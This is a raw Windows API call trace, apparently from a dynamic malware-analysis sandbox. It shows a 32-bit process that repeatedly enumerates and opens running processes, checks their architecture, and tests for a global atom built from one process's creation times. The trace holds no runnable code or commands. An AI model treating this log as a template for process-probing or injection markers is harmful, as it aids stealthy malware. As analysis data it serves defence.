	[0098.256] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.256] CloseHandle (hObject=0x2c0) returned 1
	[0098.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2c0
	[0098.256] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.256] CloseHandle (hObject=0x2c0) returned 1
	[0098.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2c0
	[0098.256] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.256] CloseHandle (hObject=0x2c0) returned 1
	[0098.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2c0
	[0098.256] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.256] CloseHandle (hObject=0x2c0) returned 1
	[0098.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2c0
	[0098.257] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.257] CloseHandle (hObject=0x2c0) returned 1
	[0098.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2c0
	[0098.257] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.257] CloseHandle (hObject=0x2c0) returned 1
	[0098.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2c0
	[0098.257] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.257] CloseHandle (hObject=0x2c0) returned 1
	[0098.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2c0
	[0098.257] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.257] CloseHandle (hObject=0x2c0) returned 1
	[0098.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2c0
	[0098.257] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.257] CloseHandle (hObject=0x2c0) returned 1
	[0098.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2c0
	[0098.258] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.258] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.258] GetProcessTimes (in: hProcess=0x2c0, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.258] wsprintfA (in: param_1=0x666980, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.258] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.259] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.259] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.259] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.259] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.259] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.260] CloseHandle (hObject=0x2c0) returned 1
	[0098.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2c0
	[0098.260] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.260] CloseHandle (hObject=0x2c0) returned 1
	[0098.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2c0
	[0098.260] IsWow64Process (in: hProcess=0x2c0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.260] CloseHandle (hObject=0x2c0) returned 1
	[0098.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16778) returned 0xc0000004
	[0098.352] VirtualAlloc (lpAddress=0x0, dwSize=0x16878, flAllocationType=0x3000, flProtect=0x4) returned 0x2c30000
	[0098.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c30000, Length=0x16878, ResultLength=0x0 | out: SystemInformation=0x2c30000, ResultLength=0x0) returned 0x0
	[0098.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2e8
	[0098.356] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.356] CloseHandle (hObject=0x2e8) returned 1
	[0098.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2e8
	[0098.357] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.357] CloseHandle (hObject=0x2e8) returned 1
	[0098.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2e8
	[0098.357] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.357] CloseHandle (hObject=0x2e8) returned 1
	[0098.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2e8
	[0098.357] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.357] CloseHandle (hObject=0x2e8) returned 1
	[0098.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2e8
	[0098.358] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.358] CloseHandle (hObject=0x2e8) returned 1
	[0098.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2e8
	[0098.358] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.358] CloseHandle (hObject=0x2e8) returned 1
	[0098.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2e8
	[0098.358] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.358] CloseHandle (hObject=0x2e8) returned 1
	[0098.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2e8
	[0098.358] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.358] CloseHandle (hObject=0x2e8) returned 1
	[0098.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2e8
	[0098.358] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.358] CloseHandle (hObject=0x2e8) returned 1
	[0098.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2e8
	[0098.359] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.359] CloseHandle (hObject=0x2e8) returned 1
	[0098.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2e8
	[0098.359] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.359] CloseHandle (hObject=0x2e8) returned 1
	[0098.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2e8
	[0098.359] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.359] CloseHandle (hObject=0x2e8) returned 1
	[0098.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2e8
	[0098.359] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.359] CloseHandle (hObject=0x2e8) returned 1
	[0098.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2e8
	[0098.359] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.360] CloseHandle (hObject=0x2e8) returned 1
	[0098.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2e8
	[0098.360] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.360] CloseHandle (hObject=0x2e8) returned 1
	[0098.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2e8
	[0098.360] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.360] CloseHandle (hObject=0x2e8) returned 1
	[0098.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2e8
	[0098.360] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.360] CloseHandle (hObject=0x2e8) returned 1
	[0098.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2e8
	[0098.360] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.360] CloseHandle (hObject=0x2e8) returned 1
	[0098.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2e8
	[0098.360] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.360] CloseHandle (hObject=0x2e8) returned 1
	[0098.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2e8
	[0098.361] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.361] CloseHandle (hObject=0x2e8) returned 1
	[0098.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2e8
	[0098.361] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.361] CloseHandle (hObject=0x2e8) returned 1
	[0098.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2e8
	[0098.361] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.361] CloseHandle (hObject=0x2e8) returned 1
	[0098.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2e8
	[0098.361] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.361] CloseHandle (hObject=0x2e8) returned 1
	[0098.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2e8
	[0098.361] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.361] CloseHandle (hObject=0x2e8) returned 1
	[0098.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2e8
	[0098.362] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.362] CloseHandle (hObject=0x2e8) returned 1
	[0098.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2e8
	[0098.362] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.362] CloseHandle (hObject=0x2e8) returned 1
	[0098.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2e8
	[0098.362] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.362] CloseHandle (hObject=0x2e8) returned 1
	[0098.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2e8
	[0098.362] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.362] CloseHandle (hObject=0x2e8) returned 1
	[0098.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2e8
	[0098.362] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.362] CloseHandle (hObject=0x2e8) returned 1
	[0098.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2e8
	[0098.363] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.363] CloseHandle (hObject=0x2e8) returned 1
	[0098.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2e8
	[0098.363] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.363] CloseHandle (hObject=0x2e8) returned 1
	[0098.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2e8
	[0098.363] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.363] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0098.363] GetProcessTimes (in: hProcess=0x2e8, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0098.363] wsprintfA (in: param_1=0x66d128, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0098.364] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.364] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0098.364] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0098.364] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0098.364] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0098.364] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0098.364] CloseHandle (hObject=0x2e8) returned 1
	[0098.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0098.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0098.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2e8
	[0098.365] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.365] CloseHandle (hObject=0x2e8) returned 1
	[0098.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2e8
	[0098.365] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.365] CloseHandle (hObject=0x2e8) returned 1
	[0098.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16818) returned 0xc0000004
	[0098.416] VirtualAlloc (lpAddress=0x0, dwSize=0x16918, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000
	[0098.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2eb0000, Length=0x16918, ResultLength=0x0 | out: SystemInformation=0x2eb0000, ResultLength=0x0) returned 0x0
	[0098.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0098.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0098.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0098.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0098.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0098.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0098.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0098.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0098.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0098.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0098.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0098.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0098.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0098.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0098.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0098.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0098.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0098.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0098.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2e8
	[0098.421] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.421] CloseHandle (hObject=0x2e8) returned 1
	[0098.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0098.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0098.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2e8
	[0098.422] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.422] CloseHandle (hObject=0x2e8) returned 1
	[0098.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0098.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2e8
	[0098.422] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.422] CloseHandle (hObject=0x2e8) returned 1
	[0098.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2e8
	[0098.422] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.422] CloseHandle (hObject=0x2e8) returned 1
	[0098.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2e8
	[0098.422] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.422] CloseHandle (hObject=0x2e8) returned 1
	[0098.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2e8
	[0098.423] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.423] CloseHandle (hObject=0x2e8) returned 1
	[0098.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2e8
	[0098.423] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.423] CloseHandle (hObject=0x2e8) returned 1
	[0098.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2e8
	[0098.423] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.423] CloseHandle (hObject=0x2e8) returned 1
	[0098.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0098.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2e8
	[0098.423] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.423] CloseHandle (hObject=0x2e8) returned 1
	[0098.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2e8
	[0098.423] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.423] CloseHandle (hObject=0x2e8) returned 1
	[0098.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2e8
	[0098.424] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.424] CloseHandle (hObject=0x2e8) returned 1
	[0098.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2e8
	[0098.424] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.424] CloseHandle (hObject=0x2e8) returned 1
	[0098.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2e8
	[0098.424] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.424] CloseHandle (hObject=0x2e8) returned 1
	[0098.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2e8
	[0098.424] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.424] CloseHandle (hObject=0x2e8) returned 1
	[0098.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2e8
	[0098.424] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.424] CloseHandle (hObject=0x2e8) returned 1
	[0098.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2e8
	[0098.425] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.425] CloseHandle (hObject=0x2e8) returned 1
	[0098.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2e8
	[0098.425] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.425] CloseHandle (hObject=0x2e8) returned 1
	[0098.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2e8
	[0098.425] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.425] CloseHandle (hObject=0x2e8) returned 1
	[0098.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2e8
	[0098.425] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.425] CloseHandle (hObject=0x2e8) returned 1
	[0098.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2e8
	[0098.425] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.425] CloseHandle (hObject=0x2e8) returned 1
	[0098.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2e8
	[0098.425] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.426] CloseHandle (hObject=0x2e8) returned 1
	[0098.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2e8
	[0098.426] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.426] CloseHandle (hObject=0x2e8) returned 1
	[0098.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2e8
	[0098.426] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.426] CloseHandle (hObject=0x2e8) returned 1
	[0098.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2e8
	[0098.426] IsWow64Process (in: hProcess=0x2e8, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0098.426] CloseHandle (hObject=0x2e8) returned 1
	[0098.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2e8
